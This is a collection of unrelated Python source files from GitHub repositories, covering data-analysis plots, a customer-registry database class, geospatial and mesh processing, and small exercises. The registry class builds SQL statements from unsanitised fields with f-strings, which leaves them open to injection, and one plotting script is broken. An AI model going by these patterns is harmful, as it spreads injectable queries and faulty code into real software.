pd.crosstab(df1.arrival_date_month,df1.is_canceled,margins=True)\ndf1_cancel['cancel_percent']=df1_cancel['1']*100/df1_cancel['All']\ndf1_cancel.drop('All',axis=1,inplace=True)\ndf1_cancel.drop('All',axis=0,inplace=True)\ndf1_cancel=df1_cancel.reindex(['January','February','March','April','May','June','July','August','September',\n'October','November','December'])\ndf1_cancel=df1_cancel.reset_index()\n\nsns.lineplot(\n x='arrival_date_month',\n y='cancel_percent',\n data=df1_cancel,\n ci =None, \n palette = 'viridis', \n alpha = 0.6,\n label='Transient', \n lw=4 \n)\n\ndf2=df[df['customer_type']=='Contract']\ndf2_cancel = 
pd.crosstab(df2.arrival_date_month,df2.is_canceled,margins=True)\ndf2_cancel['cancel_percent']=df2_cancel['1']*100/df2_cancel['All']\ndf2_cancel.drop('All',axis=1,inplace=True)\ndf2_cancel.drop('All',axis=0,inplace=True)\ndf2_cancel=df2_cancel.reindex(['January','February','March','April','May','June','July','August','September',\n'October','November','December'])\ndf2_cancel=df2_cancel.reset_index()\nsns.lineplot(\n x='arrival_date_month',\n y='cancel_percent',\n data=df2_cancel,\n ci =None, \n palette = 'viridis', \n alpha = 0.6,\n label='Contract', \n lw=4 \n)\n\ndf3=df[df['customer_type']=='Transient-Party']\ndf3_cancel = pd.crosstab(df3.arrival_date_month,df3.is_canceled,margins=True)\ndf3_cancel['cancel_percent']=df3_cancel['1']*100/df3_cancel['All']\ndf3_cancel.drop('All',axis=1,inplace=True)\ndf3_cancel.drop('All',axis=0,inplace=True)\ndf3_cancel=df3_cancel.reindex(['January','February','March','April','May','June','July','August','September',\n'October','November','December'])\ndf3_cancel=df3_cancel.reset_index()\nsns.lineplot(\n x='arrival_date_month',\n y='cancel_percent',\n data=df3_cancel,\n ci =None, \n palette = 'viridis', \n alpha = 0.6,\n label='Transient-Party', \n lw=4 \n)\n\ndf4=df[df['customer_type']=='Group']\ndf4_cancel = pd.crosstab(df4.arrival_date_month,df4.is_canceled,margins=True)\ndf4_cancel['cancel_percent']=df4_cancel['1']*100/df4_cancel['All']\ndf4_cancel.drop('All',axis=1,inplace=True)\ndf4_cancel.drop('All',axis=0,inplace=True)\ndf4_cancel=df4_cancel.reindex(['January','February','March','April','May','June','July','August','September',\n'October','November','December'])\ndf4_cancel=df4_cancel.reset_index()\nsns.lineplot(\n x='arrival_date_month',\n y='cancel_percent',\n data=df4_cancel,\n ci =None, \n palette = 'viridis', \n alpha = 0.6,\n label='Group', \n lw=4 \n)\nplt.title('Cutomer type of cancelled bookings')\nst.pyplot(fig)\n\n#The relationship between cancellation rate and parking space\nst.write('Cancellation rate about the car parking and meal')\ntbl2=pd.crosstab(df.required_car_parking_spaces,df.is_canceled,margins=True)\ntbl2['cancel-percent']=tbl2['1']*100/tbl2['All']\ntbl2.drop('All',inplace=True)\nfig, ax = plt.subplots(1,2,figsize=(15, 7))\ntbl2['cancel-percent'].plot.bar(color='#e4bfcb',ax=ax[0])\nplt.xticks(rotation=0)\nplt.xlabel('required_car_parking_spaces')\nplt.ylabel('Cancellation %')\nplt.title('Cancellation rates about car parking')\nplt.show()\n\n\n#Relationship between cancellation rate and meal package\ntbl3=pd.crosstab(df.meal,df.is_canceled,margins=True)\ntbl3['cancel-percent']=tbl3['1']*100/tbl3['All']\ntbl3.drop('All',inplace=True)\ntbl3['cancel-percent'].plot.bar(color='#eec5cc',ax=ax[1])\nplt.xticks(rotation=0)\nplt.xlabel('meal')\nplt.ylabel('Cancellation %')\nplt.title('Cancellation rates about meal')\nplt.show()\nst.pyplot(fig)\n\n\nst.balloons()\n\n#adr\nst.subheader('Average room price(adr)')\n\n#ADR about the month\nst.write('ADR about the month')\n\nconfirmed_bookings = df[df['is_canceled']=='0']\nfig, ax =plt.subplots(figsize=(15, 7))\nsns.lineplot(x = 'arrival_date_month', \n y = 'adr', \n hue = 'hotel', \n data = confirmed_bookings, \n ci =None, \n palette = 'viridis', \n alpha = 0.6,\n lw=5)\nplt.title('Monthly ADR')\nplt.xlabel('Months')\n\n\nplt.tight_layout()\nst.pyplot(fig)\nst.subheader('See the analysis on the next 
page!')\n\n\n\n\n","repo_name":"haloikuy/Final_project_team31","sub_path":"EDA.py","file_name":"EDA.py","file_ext":"py","file_size_in_byte":10398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37495988491","text":"import pyodbc\n\n\n# BACK-END\nclass Pessoa:\n dadosconnect = \"Driver={SQL Server};Server=.;Database=BDCadastro;\"\n\n def __init__(self, cad, nome, data, cpf, cep, rua, num, bairro, comp,\n cidade, estado, pais, tel1, tel2, email, obs):\n self.cad = cad\n self.nome = nome\n self.data = data\n self.cpf = cpf\n self.cep = cep\n self.rua = rua\n self.num = num\n self.bairro = bairro\n self.comp = comp\n self.cid = cidade\n self.estado = estado\n self.pais = pais\n self.tel1 = tel1\n self.tel2 = tel2\n self.email = email\n self.obs = obs\n self.busca = []\n\n def adicionar(self):\n connection = pyodbc.connect(self.dadosconnect)\n cursor = connection.cursor()\n cursor.execute(f''' INSERT INTO Cadastro2 (Nome, DataNascimento, CPF, CEP, Logradouro, \n Número, Bairro, Complemento, Cidade, Estado, País, Telefone1, Telefone2, Email, Observação)\n \n VALUES('{self.nome}', \n '{self.data}', \n '{self.cpf}',\n '{self.cep}',\n '{self.rua}', \n '{self.num}', \n '{self.bairro}', \n '{self.comp}', \n '{self.cid}', \n '{self.estado}', \n '{self.pais}', \n '{self.tel1}', \n '{self.tel2}',\n '{self.email}',\n '{self.obs}'); ''')\n cursor.commit()\n cursor.close()\n connection.close()\n\n def excluir(self):\n connection = pyodbc.connect(self.dadosconnect)\n cursor = connection.cursor()\n # INSERIR MESSAGEBOX PARA CONFIRMAR AÇÃO\n cursor.execute(f''' DELETE FROM \n Cadastro2\n WHERE \n NumCad='{self.cad}'; ''')\n cursor.commit()\n cursor.close()\n connection.close()\n\n def procurar(self):\n connection = pyodbc.connect(self.dadosconnect)\n cursor = connection.cursor()\n cursor.execute(f'''\n SELECT \n *\n FROM \n Cadastro2 \n WHERE\n Nome='{self.nome}' ''')\n\n result = cursor.fetchone()\n self.cad = str(result[0])\n self.nome = str(result[1])\n self.data = str(result[2])\n self.cpf = str(result[3])\n self.cep = str(result[4])\n self.rua = str(result[5])\n self.num = str(result[6])\n self.bairro = str(result[7])\n self.comp = str(result[8])\n self.cid = str(result[9])\n self.estado = str(result[10])\n self.pais = str(result[11])\n self.tel1 = str(result[12])\n self.tel2 = str(result[13])\n self.email = str(result[14])\n self.obs = str(result[15])\n cursor.close()\n connection.close()\n return\n\n def editar(self):\n connection = pyodbc.connect(self.dadosconnect)\n cursor = connection.cursor()\n cursor.execute(f'''\n UPDATE \n Cadastro2\n SET\n Nome = '{self.nome}',\n DataNascimento = '{self.data}', \n CPF = '{self.cpf}',\n CEP = '{self.cep}',\n Logradouro = '{self.rua}', \n Número = '{self.num}', \n Bairro = '{self.bairro}', \n Complemento = '{self.comp}', \n Cidade = '{self.cid}', \n Estado = '{self.estado}', \n País = '{self.pais}', \n Telefone1 = '{self.tel1}', \n Telefone2 = '{self.tel2}',\n Email = '{self.email}',\n Observação = '{self.obs}'\n \n WHERE\n NumCad='{self.cad}' OR Nome='{self.nome}'\n ''')\n cursor.commit()\n print(f'{self.nome}')\n cursor.close()\n connection.close()\n return","repo_name":"liliansom/CadastroClientes","sub_path":"Pessoa.py","file_name":"Pessoa.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"20425514804","text":"from django.core.management.base import BaseCommand\nfrom django.core.management.base 
import CommandError\nfrom aclarknet.database.models import Note as model\nfrom aclarknet.database.utils import mail_compose\nfrom aclarknet.database.utils import mail_recipients\nfrom aclarknet.database.utils import mail_send\n\n\nclass Command(BaseCommand):\n help = 'Mail obj.field to obj => contacts'\n\n def add_arguments(self, parser):\n parser.add_argument('obj_type')\n parser.add_argument('obj_id')\n\n def handle(self, *args, **options):\n obj_id = options.get('obj_id')\n obj_type = options.get('obj_type')\n obj = model.objects.get(pk=obj_id)\n recipients = mail_recipients(obj)\n for first_name, email_address in recipients:\n mail_send(\n **mail_compose(\n obj,\n first_name=first_name,\n mail_to=email_address))","repo_name":"aclark4life/aclark-net-2018-2","sub_path":"aclarknet/database/management/commands/mail_obj.py","file_name":"mail_obj.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14367965581","text":"import os\nimport argparse\nimport logging\n\nimport trimesh\nimport numpy as np\n\nfrom libmesh import check_mesh_contains\n\nimport processor.errors as errors\nimport processor.process_sample as sampler\n\n\ndef occupancies_uniform(\n f_in,\n f_out,\n dim=256,\n padding=0.1,\n overwrite=False,\n):\n # Load the mesh\n mesh = trimesh.load(f_in)\n\n # Get uniform points\n points = sampler.uniform_sample_points(dim=dim, padding=padding)\n\n # Get occupancies\n occupancies = check_mesh_contains(mesh, points)\n logging.debug(\n \"Mesh had {}/{} interior points\".format(\n occupancies.astype(int).sum(), occupancies.shape[0]\n )\n )\n\n # Save as boolean values\n if overwrite or not os.path.exists(f_out):\n logging.debug(\"Saving to: {}\".format(f_out))\n np.savez(f_out, occ=occupancies.astype(bool))\n\n\ndef process(\n obj,\n num_results,\n overwrite,\n executor,\n args,\n):\n\n dim = args.voxel_dim\n\n for idx in range(num_results):\n f_in = obj.path_b(idx)\n f_out = obj.path_b_uniform_occ(idx, dim)\n\n if os.path.exists(f_in) and (not os.path.exists(f_out) or overwrite):\n executor.graceful_submit(\n occupancies_uniform,\n f_in=f_in,\n f_out=f_out,\n overwrite=overwrite,\n dim=dim,\n )\n\n\ndef validate_outputs(\n obj,\n num_results,\n args,\n):\n\n dim = args.voxel_dim\n\n outputs = []\n for idx in range(num_results):\n if not os.path.exists(obj.path_b_uniform_occ(idx, dim)):\n outputs.append(False)\n continue\n outputs.append(True)\n return outputs\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Computes the occupancy values for samples points on and \"\n + \"around an object. Accepts the arguments common for sampling.\"\n )\n parser.add_argument(dest=\"f_in\", type=str, help=\"Path to the input file.\")\n parser.add_argument(dest=\"f_out\", type=str, help=\"Path to the output file.\")\n parser.add_argument(\n \"--dim\",\n \"-d\",\n type=int,\n default=256,\n help=\"Dimension of point samples.\",\n )\n parser.add_argument(\n \"--padding\",\n \"-p\",\n type=float,\n default=0.1,\n help=\"Extra padding to add when performing uniform sampling. 
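The mail_obj management command above declares positional obj_type and obj_id arguments. A hedged sketch of invoking it programmatically from inside a configured Django project (the argument values "note" and "1" are placeholders):

from django.core.management import call_command

# equivalent to: python manage.py mail_obj note 1
call_command("mail_obj", "note", "1")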
eg 0 = \"\n        + \"uniform sampling is done in unit cube.\",\n    )\n    args = parser.parse_args()\n\n    occupancies_uniform(\n        f_in=args.f_in,\n        f_out=args.f_out,\n        dim=args.dim,\n        padding=args.padding,\n    )\n","repo_name":"Terascale-All-sensing-Research-Studio/DeepJoin","sub_path":"fracturing/processor/process_uniform_occupancy.py","file_name":"process_uniform_occupancy.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"26560969021","text":"# This script makes plots of the coincident microbursts\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom datetime import datetime, timedelta\nimport os\nimport sys\n\n\nsys.path.insert(0, '/home/mike/research/mission-tools/ac6')\n\nimport read_ac_data\n\n# Path containing the catalog file to validate\ncatPath = os.path.join('/home/mike/research/ac6-microburst-scale-sizes/data/'\n            'coincident_microbursts_catalogues', 'flash_catalogue_v2_sorted.txt')\npltWidth = 5 # seconds\n\nplotPath = ('/home/mike/research/ac6-microburst-scale-sizes/'\n            'data/plots/{}'.format(datetime.now().date()))\nif not os.path.exists(plotPath):\n    os.makedirs(plotPath)\n    print('Made plot directory at', plotPath)\n\n# Load and filter the catalog (ExploreDependencies comes from elsewhere in this project)\nc = ExploreDependencies(catPath)\nc.filter()\n\n# Set up plots\nfig, ax = plt.subplots(1)\ncurrent_date = datetime.min.date()\nfor i in range(len(c.cat['burstType'])):\n    # Reload the 10 Hz data only when the event date changes\n    if c.cat['dateTimeA'][i].date() != current_date:\n        current_date = c.cat['dateTimeA'][i].date()\n        dataA = read_ac_data.read_ac_data_wrapper('A', current_date, dType='10Hz')\n        dataB = read_ac_data.read_ac_data_wrapper('B', current_date, dType='10Hz')\n\n    # Pick out only the valid data\n    validIdxA = np.where(dataA['dos1rate'] > 0)[0]\n    validIdxB = np.where(dataB['dos1rate'] > 0)[0]\n    # Plot the unshifted data\n    ax.plot(dataA['dateTime'][validIdxA], dataA['dos1rate'][validIdxA], \n        label='AC-6 A')\n    ax.plot(dataB['dateTime'][validIdxB], dataB['dos1rate'][validIdxB], \n        label='AC-6 B') \n\n    # Set the time range around the coincident microburst event, and then save.\n    xlim = (c.cat['dateTimeA'][i] - timedelta(seconds=pltWidth), \n        c.cat['dateTimeA'][i] + timedelta(seconds=pltWidth))\n\n    # Calculate ylimits from the xlimits\n    idxA = np.where((dataA['dateTime'] > xlim[0]) & \n        (dataA['dateTime'] < xlim[1]) &\n        (dataA['dos1rate'] > 0))[0]\n    idxB = np.where((dataB['dateTime'] > xlim[0]) & \n        (dataB['dateTime'] < xlim[1]) &\n        (dataB['dos1rate'] > 0))[0]\n    ylim = (0.9*np.min(dataA['dos1rate'][idxA]), \n        1.1*np.max(dataA['dos1rate'][idxA]))\n\n    ax.set(title='AC-6 Coincident microburst validation', xlabel='UTC', \n        ylabel='dos1 [counts/s]', xlim=xlim, ylim=ylim)\n    ax.legend(loc=1)\n\n    plt.savefig(os.path.join(plotPath, ))\n","repo_name":"mshumko/ac6_microburst_scale_sizes","sub_path":"rabbit_holes/validation_plots.py","file_name":"validation_plots.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26980584815","text":"\"\"\"\nModel exported as python.\nName : WBT\nGroup : \nWith QGIS : 31416\n\"\"\"\n\nfrom qgis.core import QgsProcessing\nfrom qgis.core import QgsProcessingAlgorithm\nfrom qgis.core import QgsProcessingMultiStepFeedback\nfrom qgis.core import QgsProcessingParameterRasterLayer\nfrom qgis.core import QgsProcessingParameterNumber\nfrom qgis.core import QgsProcessingParameterMapLayer\nfrom qgis.core import QgsProcessingParameterVectorDestination\nfrom qgis.core import 
QgsProcessingParameterRasterDestination\nfrom qgis.core import QgsCoordinateReferenceSystem\nimport processing\n\n\nclass Wbt(QgsProcessingAlgorithm):\n\n def initAlgorithm(self, config=None):\n self.addParameter(QgsProcessingParameterRasterLayer('DEM', 'DEM', defaultValue=None))\n self.addParameter(QgsProcessingParameterNumber('Streamtreshold', 'Stream_treshold', type=QgsProcessingParameterNumber.Integer, minValue=-3, maxValue=10, defaultValue=1))\n self.addParameter(QgsProcessingParameterMapLayer('pour', 'pour', defaultValue=None, types=[QgsProcessing.TypeVectorPoint]))\n self.addParameter(QgsProcessingParameterVectorDestination('Watershed', 'Watershed', type=QgsProcessing.TypeVectorPolygon, createByDefault=True, defaultValue=None))\n self.addParameter(QgsProcessingParameterRasterDestination('Streams', 'Streams', createByDefault=True, defaultValue=None))\n self.addParameter(QgsProcessingParameterVectorDestination('Snapped', 'snapped', type=QgsProcessing.TypeVectorPoint, createByDefault=True, defaultValue=None))\n\n def processAlgorithm(self, parameters, context, model_feedback):\n # Use a multi-step feedback, so that individual child algorithm progress reports are adjusted for the\n # overall progress through the model\n feedback = QgsProcessingMultiStepFeedback(11, model_feedback)\n results = {}\n outputs = {}\n\n # Rectangles, ovals, diamonds\n alg_params = {\n 'HEIGHT': 2,\n 'INPUT': parameters['pour'],\n 'ROTATION': 0,\n 'SEGMENTS': 5,\n 'SHAPE': 0,\n 'WIDTH': 2,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['RectanglesOvalsDiamonds'] = processing.run('native:rectanglesovalsdiamonds', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(1)\n if feedback.isCanceled():\n return {}\n\n # ClipRasterToPolygon\n alg_params = {\n 'input': parameters['DEM'],\n 'maintain_dimensions': False,\n 'polygons': outputs['RectanglesOvalsDiamonds']['OUTPUT'],\n 'output': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['Cliprastertopolygon'] = processing.run('wbt:ClipRasterToPolygon', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(2)\n if feedback.isCanceled():\n return {}\n\n # Assign projection\n alg_params = {\n 'CRS': QgsCoordinateReferenceSystem('EPSG:4326'),\n 'INPUT': outputs['Cliprastertopolygon']['output']\n }\n outputs['AssignProjection'] = processing.run('gdal:assignprojection', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(3)\n if feedback.isCanceled():\n return {}\n\n # Assign projection\n alg_params = {\n 'CRS': QgsCoordinateReferenceSystem('EPSG:4326'),\n 'INPUT': outputs['RectanglesOvalsDiamonds']['OUTPUT'],\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['AssignProjection'] = processing.run('native:assignprojection', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(4)\n if feedback.isCanceled():\n return {}\n\n # BreachDepressions\n alg_params = {\n 'dem': outputs['Cliprastertopolygon']['output'],\n 'fill_pits': False,\n 'flat_increment': None,\n 'max_depth': None,\n 'max_length': None,\n 'output': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['Breachdepressions'] = processing.run('wbt:BreachDepressions', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(5)\n if feedback.isCanceled():\n return {}\n\n # FillDepressions\n alg_params = {\n 'dem': outputs['Breachdepressions']['output'],\n 'fix_flats': True,\n 
'flat_increment': None,\n 'max_depth': None,\n 'output': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['Filldepressions'] = processing.run('wbt:FillDepressions', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(6)\n if feedback.isCanceled():\n return {}\n\n # FlowAccumulationFullWorkflow\n alg_params = {\n 'clip': False,\n 'dem': outputs['Filldepressions']['output'],\n 'esri_pntr': False,\n 'log': False,\n 'out_type': 1,\n 'out_accum': QgsProcessing.TEMPORARY_OUTPUT,\n 'out_dem': QgsProcessing.TEMPORARY_OUTPUT,\n 'out_pntr': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['Flowaccumulationfullworkflow'] = processing.run('wbt:FlowAccumulationFullWorkflow', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(7)\n if feedback.isCanceled():\n return {}\n\n # ExtractStreams\n alg_params = {\n 'flow_accum': outputs['Flowaccumulationfullworkflow']['out_accum'],\n 'threshold': parameters['Streamtreshold'],\n 'zero_background': False,\n 'output': parameters['Streams']\n }\n outputs['Extractstreams'] = processing.run('wbt:ExtractStreams', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n results['Streams'] = outputs['Extractstreams']['output']\n\n feedback.setCurrentStep(8)\n if feedback.isCanceled():\n return {}\n\n # SnapPourPoints\n alg_params = {\n 'flow_accum': outputs['Flowaccumulationfullworkflow']['out_accum'],\n 'pour_pts': parameters['pour'],\n 'snap_dist': 0.01,\n 'output': parameters['Snapped']\n }\n outputs['Snappourpoints'] = processing.run('wbt:SnapPourPoints', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n results['Snapped'] = outputs['Snappourpoints']['output']\n\n feedback.setCurrentStep(9)\n if feedback.isCanceled():\n return {}\n\n # Watershed\n alg_params = {\n 'd8_pntr': outputs['Flowaccumulationfullworkflow']['out_pntr'],\n 'esri_pntr': False,\n 'pour_pts': outputs['Snappourpoints']['output'],\n 'output': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['Watershed'] = processing.run('wbt:Watershed', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n\n feedback.setCurrentStep(10)\n if feedback.isCanceled():\n return {}\n\n # Polygonize (raster to vector)\n alg_params = {\n 'BAND': 1,\n 'EIGHT_CONNECTEDNESS': False,\n 'EXTRA': '',\n 'FIELD': 'DN',\n 'INPUT': outputs['Watershed']['output'],\n 'OUTPUT': parameters['Watershed']\n }\n outputs['PolygonizeRasterToVector'] = processing.run('gdal:polygonize', alg_params, context=context, feedback=feedback, is_child_algorithm=True)\n results['Watershed'] = outputs['PolygonizeRasterToVector']['OUTPUT']\n return results\n\n def name(self):\n return 'WBT'\n\n def displayName(self):\n return 'WBT'\n\n def group(self):\n return ''\n\n def groupId(self):\n return ''\n\n def createInstance(self):\n return Wbt()\n","repo_name":"hckaraman/Mike_Tools","sub_path":"QGIS/delineation_model.py","file_name":"delineation_model.py","file_ext":"py","file_size_in_byte":7985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"634991121","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nimport pandas as pd\nimport numpy as np\n\n\n# %%\ndef fill_strange_vals(df: pd.DataFrame) -> pd.DataFrame:\n df = df.replace('<15',value = 14)\n df['agas_code'] = df['agas_code'].fillna('999.0') # random statistical area\n return df\n\n\n# %%\ndef cols_to_int(df: pd.DataFrame) -> pd.DataFrame:\n 
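One plausible way to drive the exported Wbt model from the QGIS Python console is sketched below; the input paths are hypothetical, and the parameter keys mirror the ones declared in initAlgorithm above (including the model's own "Streamtreshold" spelling, kept as-is since it is an identifier):

import processing

params = {
    'DEM': '/data/dem.tif',                # hypothetical input raster
    'Streamtreshold': 5,
    'pour': '/data/pour_points.gpkg',      # hypothetical pour-point layer
    'Watershed': 'TEMPORARY_OUTPUT',
    'Streams': 'TEMPORARY_OUTPUT',
    'Snapped': 'TEMPORARY_OUTPUT',
}
result = processing.run(Wbt(), params)
print(result['Watershed'])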
columns = [\n 'agas_code',\n 'accumulated_cases',\n 'accumulated_recoveries',\n 'accumulated_deaths',\n 'accumulated_hospitalized',\n 'accumulated_vaccination_first_dose',\n 'accumulated_vaccination_second_dose',\n 'accumulated_diagnostic_tests'\n ]\n for h in columns:\n try:\n df[h]= df[h].astype('int')\n except:\n df[h]= df[h].astype('float')\n return df\n\n\n# %%\ndef bin_to_int(df: pd.DataFrame):\n return df.replace({False: 0, True: 1}, inplace=True)\n\n\n# %%\ndef drop_cols(df: pd.DataFrame):\n columns = [\n 'town',\n # 'new_cases_on_date',\n # 'new_recoveries_on_date',\n # 'new_hospitalized_on_date',\n # 'new_deaths_on_date',\n # 'new_diagnostic_tests_on_date',\n 'new_vacc_first_dose_on_date',\n 'new_vacc_second_dose_on_date',\n 'accumulated_vaccination_first_dose',\n 'accumulated_vaccination_second_dose'\n ]\n return df.drop(columns, axis=1)\n\n\n# %%\ndef calc_changes(df: pd.DataFrame):\n df = df.sort_values(by=[\"agas_code\",\"date\"])\n df = df.assign(new_cases = ( df['accumulated_cases'] - df['accumulated_recoveries'] - df['accumulated_deaths']) )\n df[\"new_cases_percent\"] = df.groupby(\"agas_code\")[\"new_cases\"].pct_change()\n\n df[\"new_deaths\"] = df.groupby(\"agas_code\")[\"accumulated_deaths\"].diff()\n df[\"new_recoveries\"] = df.groupby(\"agas_code\")[\"accumulated_recoveries\"].diff()\n\n # some na's might have been created\n df[\"new_deaths\"] =df[\"new_deaths\"].fillna(0)\n df[\"new_recoveries\"] =df[\"new_recoveries\"].fillna(0)\n df[\"new_cases_percent\"] = df[\"new_cases_percent\"].fillna(0)\n df = df.replace(np.inf, 100)\n df = df.replace(-np.inf, -100)\n return df\n\n\n# %%\ndef preprocess(df: pd.DataFrame) -> pd.DataFrame:\n df = fill_strange_vals(df)\n df = cols_to_int(df)\n bin_to_int(df)\n df = calc_changes(df)\n df = drop_cols(df)\n return df\n\n\n","repo_name":"michaelsich/Covid19-sectors-JLM","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2567088917","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nEX6.5.1.py\n\nGauss-Legendre quadrature of a function in 1-dimension\n\nProblem description:\n \n Integrate f(x)=l + x^2 - 3x^3 + 4x^5 between x = -1 and x = 1\n\nVariable descriptions:\n point1 = integration (or sampling) points\n weight1 = weighting coefficients\n ngl = number of integration points\n\"\"\"\n\nimport feglqd1\n\nngl = 3 # (2*ngl - 1) = 5\npoint1, weight1 = feglqd1.feglqd1(ngl) # extract sampling points and weights\n\n# -----------------------------------\n# summation for numerical integration\n# -----------------------------------\nvalue = 0.0\nfor int in range(ngl):\n x = point1[int]\n wt = weight1[int]\n func = 1 + x**2 -3*x**3 + 4*x**5 # evaluate function at sampling point\n value = value + func*wt\n\nprint(value) # print the solution","repo_name":"PNMZR/Python3_FEM_Codes_Recomposed_from_Other_Programming_Languages","sub_path":"FEMM/example6_5_1.py","file_name":"example6_5_1.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34319469624","text":"class Auto:\n def __init__(self, registracni_znacka, typ_vozidla, najete_km):\n self.registracni_znacka = registracni_znacka\n self.typ_vozidla = typ_vozidla\n self.najete_km = int(najete_km)\n self.dostupne = True\n\n def pujc_auto(self):\n if self.dostupne == True:\n print(\"Potvrzuji zapůjčení vozidla\")\n self.dostupne = False\n 
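The 3-point Gauss-Legendre rule in example6_5_1 is exact for polynomials up to degree 2*3-1 = 5, so it reproduces the analytic value: the odd terms -3x^3 and 4x^5 integrate to zero over [-1, 1], leaving 2 + 2/3 = 8/3. A quick cross-check with NumPy's built-in rule, independent of the feglqd1 module:

import numpy as np

pts, wts = np.polynomial.legendre.leggauss(3)  # 3-point Gauss-Legendre rule
value = sum(w * (1 + x**2 - 3*x**3 + 4*x**5) for x, w in zip(pts, wts))
print(value)  # 2.666666... == 8/3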
else:\n print(\"Vozidlo není k dispozici\")\n\n def getInfo(self):\n print (f\"Auto {self.typ_vozidla} registrační značky {self.registracni_znacka}.\")\n\n \nauto_peugeut = Auto(\"4A2 3020\", \"Peugeot 403 Cabrio\", 47534)\nauto_skoda = Auto(\"1P3 4747\", \"Škoda Octavia\", 41253 )\n\nvypujceni_auta = input(\"Jaké vozidlo si přejete půjčit? Máme v nabídce Peugeot a Škoda.\")\n\nif vypujceni_auta == \"Škoda\":\n auto_skoda.pujc_auto()\n auto_skoda.getInfo()\nelif vypujceni_auta == \"Peugeot\":\n auto_peugeut.pujc_auto()\n auto_peugeut.getInfo()\nelse:\n print(\"Zadejte jiné auto.\")\n\nvypujceni_auta = input(\"Jaké vozidlo si ještě přejete půjčit? Máme v nabídce Peugeot a Škoda.\")\n\nif vypujceni_auta == \"Škoda\":\n auto_skoda.pujc_auto()\n auto_skoda.getInfo()\nelif vypujceni_auta == \"Peugeot\":\n auto_peugeut.pujc_auto()\n auto_peugeut.getInfo()\nelse:\n print(\"Zadejte jiné auto.\")\n\n\n\n\n\n\n\n\n\n","repo_name":"alenaturonova/python1-kurz2023","sub_path":"ukol7.py","file_name":"ukol7.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21116699365","text":"import time\nfrom benchlog import BenchLog\n\nlogging = BenchLog('test', 10000, ['testa','testb'])\nlogging.setHost('http://localhost:3000')\narray = []\nlogging.enableGPU(0)\nlogging.start()\nfor i in range(1,10000):\n temp = [None] * i\n array.append(temp)\n if(i % 1000 == 0):\n logging.log(i)\nlogging.end()\n","repo_name":"Keydex/BenchLog","sub_path":"test/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22618529236","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('stats', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='stats',\n name='poll_response',\n field=models.IntegerField(default=0, blank=True),\n ),\n ]\n","repo_name":"wizcarder/wizcard-server","sub_path":"stats/migrations/0002_stats_poll_response.py","file_name":"0002_stats_poll_response.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1943312975","text":"from typing import List\n\nfrom bst_node import BstNode\nfrom test_framework import generic_test, test_utils\n\n# This solution works \n# def find_k_largest_in_bst(tree: BstNode, k: int) -> List[int]:\n# def helper(cur):\n# if not cur:\n# return\n# helper(cur.left)\n# ans.append(cur.data)\n# helper(cur.right) \n \n# ans = []\n# helper(tree)\n# return list(reversed(ans))[:k]\n\n# This solution works\ndef find_k_largest_in_bst(tree: BstNode, k: int) -> List[int]:\n def helper(cur):\n nonlocal k \n if not cur:\n return \n if k == 0:\n return \n helper(cur.right)\n if k > 0:\n ans.append(cur.data)\n k -= 1\n helper(cur.left)\n ans = []\n helper(tree)\n return ans\n \n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main('k_largest_values_in_bst.py',\n 'k_largest_values_in_bst.tsv',\n find_k_largest_in_bst,\n 
